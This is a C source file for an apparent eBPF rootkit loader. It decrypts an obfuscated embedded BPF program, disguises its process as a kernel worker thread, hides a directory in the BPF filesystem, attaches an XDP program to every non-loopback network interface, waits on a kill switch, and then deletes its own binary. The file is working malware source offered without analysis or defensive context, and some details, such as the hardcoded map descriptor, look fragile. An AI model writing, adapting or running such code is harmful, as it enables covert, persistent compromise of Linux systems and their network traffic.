#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <linux/bpf.h>
#include <dirent.h>

#include "ghost_blob.h" // Generated by Makefile

#ifndef SEED_VAL
#define SEED_VAL 0x0
#endif

// Minimal ELF parsing for BPF
struct bpf_section { uint64_t offset; uint64_t size; };

static struct bpf_section find_bpf_prog(uint8_t *blob) {
    uint64_t shoff = *(uint64_t *)(blob + 40);
    uint16_t shnum = *(uint16_t *)(blob + 60);
    uint16_t shentsize = *(uint16_t *)(blob + 58);

    for (int i = 0; i < shnum; i++) {
        uint8_t *shdr = blob + shoff + (i * shentsize);
        if (*(uint32_t *)(shdr + 4) == 1) { // SHT_PROGBITS
            return (struct bpf_section){ *(uint64_t *)(shdr + 24), *(uint64_t *)(shdr + 32) };
        }
    }
    return (struct bpf_section){0, 0};
}

void decrypt(uint8_t *data, size_t len) {
    uint32_t k = SEED_VAL;
    for (size_t i = 0; i < len; i++) {
        data[i] ^= (uint8_t)(k & 0xFF);
        k = (k >> 8) | (k << 24);
        k = k + 0x9E3779B9;
    }
}

int main() {
    // 1. Decrypt BPF in-memory (copy to heap first to avoid RO page fault)
    uint8_t *b = malloc(target_ghost_o_len);
    memcpy(b, target_ghost_o, target_ghost_o_len);
    decrypt(b, target_ghost_o_len);

    struct bpf_section sec = find_bpf_prog(b);
    if (sec.size == 0) return 1;

    // 2. Camouflage
    prctl(PR_SET_NAME, "[kworker/u2:1]", 0, 0, 0);

    // 3. Setup BPF filesystem persistence
    mkdir("/sys/fs/bpf/.srv", 0700);
    mount("none", "/sys/fs/bpf", "bpf", 0, NULL);

    // 4. Load BPF Program
    union bpf_attr attr = {
        .prog_type = BPF_PROG_TYPE_XDP,
        .insn_cnt = sec.size / 8,
        .insns = (uint64_t)(b + sec.offset),
        .license = (uint64_t)"GPL",
    };

    int pfd = syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
    if (pfd < 0) return 1;

    // 5. Attach to all non-loopback interfaces
    DIR *d = opendir("/sys/class/net");
    struct dirent *dir;
    while ((dir = readdir(d)) != NULL) {
        if (dir->d_name[0] == '.' || strcmp(dir->d_name, "lo") == 0) continue;
        
        char path[128];
        snprintf(path, sizeof(path), "/sys/class/net/%s/ifindex", dir->d_name);
        int ifd = open(path, O_RDONLY);
        char idx_s[16] = {0};
        read(ifd, idx_s, 15);
        close(ifd);
        int idx = atoi(idx_s);

        union bpf_attr lattr = {
            .link_create = { .prog_fd = pfd, .target_ifindex = idx, .attach_type = BPF_XDP }
        };
        syscall(SYS_bpf, BPF_LINK_CREATE, &lattr, sizeof(lattr));
    }
    closedir(d);

    // 6. Persistence loop + Self-destruct logic
    uint32_t kill_flag = 0;
    while (kill_flag == 0) {
        union bpf_attr mattr = {
            .map_fd = 2, // Assuming map 2 is m_kill
            .key = (uint64_t)&(uint32_t){0},
            .value = (uint64_t)&kill_flag
        };
        syscall(SYS_bpf, BPF_MAP_LOOKUP_ELEM, &mattr, sizeof(mattr));
        sleep(5);
    }

    unlink("/proc/self/exe");
    return 0;
}
